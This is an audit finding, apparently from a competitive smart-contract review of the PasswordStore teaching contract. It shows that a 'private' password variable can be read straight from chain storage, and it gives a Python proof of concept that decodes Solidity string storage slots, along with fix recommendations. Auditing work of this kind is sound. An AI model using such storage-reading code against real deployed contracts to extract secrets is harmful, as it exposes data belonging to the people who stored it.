Submission Details
Severity: high
Valid

Everything on the blockchain is readable by everyone, even PasswordStore::s_password

Summary

PasswordStore::s_password is accessible to anybody even if they are not the contract owner.

Vulnerability Details

PasswordStore::s_password is an ordinary state variable. In this contract it occupies storage slot 1 (s_owner is declared first and takes slot 0), and the private keyword only stops other contracts' code from reading it through Solidity; it does nothing to hide the slot. Anyone can query the raw state of the chain, for example with the eth_getStorageAt RPC call or with cast storage <address> 1 in Foundry, and read exactly what the owner stored. For a password shorter than 32 bytes the lookup is trivial: Solidity packs the string into the slot itself, with the text in the high-order bytes and twice its length in the lowest byte.
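The following script, added here as an illustration and not part of the original submission, shows how far the "private" password really is from being private. On a live chain the 32-byte word would come from cast storage <PasswordStore address> 1 or from eth_getStorageAt, neither of which needs a key or passes through the owner check in getPassword; here the word is a constructed value for setPassword("myPassword"). The slot index 1 assumes the Cyfrin PasswordStore declaration order (s_owner, then s_password). The decoder also handles passwords of 32 bytes or more, which Solidity stores in slots starting at keccak256(slot); that path needs a keccak implementation (pycryptodome is assumed), so the offline demo and tests inject a SHA-256 stand-in that is labelled as such and does not produce real chain addresses.

```python
import hashlib
from typing import Callable, Dict

# Assumption: Cyfrin PasswordStore declares s_owner first, then s_password.
PASSWORD_SLOT = 1

Hasher = Callable[[bytes], bytes]


def keccak256(data: bytes) -> bytes:
    """Ethereum keccak-256 via pycryptodome. Only consulted for strings of 32 bytes
    or more; short passwords are decoded without it."""
    from Crypto.Hash import keccak  # pip install pycryptodome
    h = keccak.new(digest_bits=256)
    h.update(data)
    return h.digest()


def sha256_stand_in(data: bytes) -> bytes:
    """Stand-in hasher for offline runs. NOT keccak: data slots computed with it
    will not match a real chain, but the layout logic exercised is identical."""
    return hashlib.sha256(data).digest()


def word_from_cast(hex_word: str) -> bytes:
    """Turn the 0x... value printed by `cast storage` (or returned by
    eth_getStorageAt) into a 32-byte storage word."""
    return bytes.fromhex(hex_word.removeprefix("0x").rjust(64, "0"))


def decode_string_at(slot: int, read_slot: Callable[[int], bytes],
                     hasher: Hasher = keccak256) -> str:
    """Decode a Solidity `string` state variable stored at `slot`.

    Strings shorter than 32 bytes are packed into the slot itself: data in the
    high-order bytes, 2*len (even) in the lowest byte. Longer strings keep
    2*len+1 (odd) in the slot and their bytes in consecutive slots starting
    at keccak256(slot).
    """
    word = read_slot(slot)
    if len(word) != 32:
        raise ValueError("storage word must be 32 bytes")
    if word[-1] & 1 == 0:  # short string, stored in place
        return word[: word[-1] // 2].decode("utf-8")
    length = (int.from_bytes(word, "big") - 1) // 2
    base = int.from_bytes(hasher(slot.to_bytes(32, "big")), "big")
    data = b"".join(read_slot((base + i) % 2**256) for i in range((length + 31) // 32))
    return data[:length].decode("utf-8")


def encode_string_at(slot: int, value: str, hasher: Hasher = keccak256) -> Dict[int, bytes]:
    """Inverse of decode_string_at: the storage words setPassword(value) leaves
    behind. Used here only to construct sample storage for the demo and tests."""
    data = value.encode("utf-8")
    if len(data) < 32:
        return {slot: data.ljust(31, b"\0") + bytes([2 * len(data)])}
    base = int.from_bytes(hasher(slot.to_bytes(32, "big")), "big")
    storage = {slot: (2 * len(data) + 1).to_bytes(32, "big")}
    for i in range(0, len(data), 32):
        storage[(base + i // 32) % 2**256] = data[i:i + 32].ljust(32, b"\0")
    return storage


if __name__ == "__main__":
    # Constructed word: what `cast storage <addr> 1` prints after setPassword("myPassword").
    leaked = {PASSWORD_SLOT: word_from_cast(
        "0x6d7950617373776f726400000000000000000000000000000000000000000014")}
    print("short password:", decode_string_at(PASSWORD_SLOT, leaked.__getitem__))

    # A long password spills into hashed slots; the stand-in hasher keeps this offline.
    long_pw = "correct horse battery staple correct horse battery staple"
    chain = encode_string_at(PASSWORD_SLOT, long_pw, sha256_stand_in)
    print("long password: ", decode_string_at(PASSWORD_SLOT, chain.__getitem__, sha256_stand_in))
```

Nothing in the script authenticates as the owner; it only parses bytes that every full node already serves to anyone who asks, which is why the access check in getPassword cannot protect the value.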

Impact

Because anyone can read the stored password directly from storage, the owner check in PasswordStore::getPassword gives only the appearance of confidentiality: it restricts who may call that view function, not who can see the underlying slot. The contract's core guarantee, that only the owner can view the password, therefore does not hold, and the password must be treated as public from the moment setPassword is mined.

Tools Used

Manual review

Recommendations

Encrypting inside the contract is not an option, because any key the contract could use would itself sit in public storage or calldata. Instead, encrypt the password off-chain with a key that never touches the chain, and pass only the ciphertext to PasswordStore::setPassword; PasswordStore::getPassword then returns a value that is useless to anyone without that key. Even so, the access check on getPassword adds no confidentiality and should not be presented as doing so: the contract can at best store an opaque blob, never a secret.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential.
